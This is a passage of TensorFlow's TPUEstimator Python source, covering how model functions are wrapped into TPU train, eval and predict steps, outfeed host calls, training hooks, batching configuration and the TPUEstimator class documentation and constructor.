if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if stopping_signals is not None:
identity_fn = lambda **kwargs: kwargs
tracer_host_call[user_provided_stopping_signals_name] = [
identity_fn, stopping_signals
]
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update(
{'host_call': (lambda loss_t: loss_t, [tf.reshape(loss, [1])])})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with tf.control_dependencies(host_call_outfeed_ops):
return tf.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return tf.math.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, tf.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = tf.compat.v1.get_default_graph(
)._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
tf.compat.v1.logging.warn(
'EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with tf.compat.v1.device(tf.compat.v1.tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [
tf.compat.v1.cond(
tf.math.equal(
tf.math.floormod(step, self._outfeed_every_n_steps),
0), lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: tf.no_op())
]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with tf.compat.v1.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with tf.compat.v1.device(
self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with tf.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = tf.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = tf.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = tf.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(tf.compat.v1.train.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(tf.compat.v1.train.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(
tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
tf.compat.v1.logging.info('global_step/sec: %g', global_step_per_sec)
tf.compat.v1.logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(tf.compat.v1.train.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=100):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
100.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: 1 or 2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported. Currently,
export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance to support
using TPU embedding.
export_saved_model_api_version: an integer: 1 or 2. 1 corresponds to V1,
2 corresponds to V2. (Defaults to V1). With
V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp() for
user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn. A helper function
`inference_on_tpu` is provided for V2. brn_tpu_estimator.py includes
examples for both versions i.e. TPUEstimatorExportTest and
TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in (
tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 is supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
_tpu_estimator_gauge.get_cell().set(True)
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
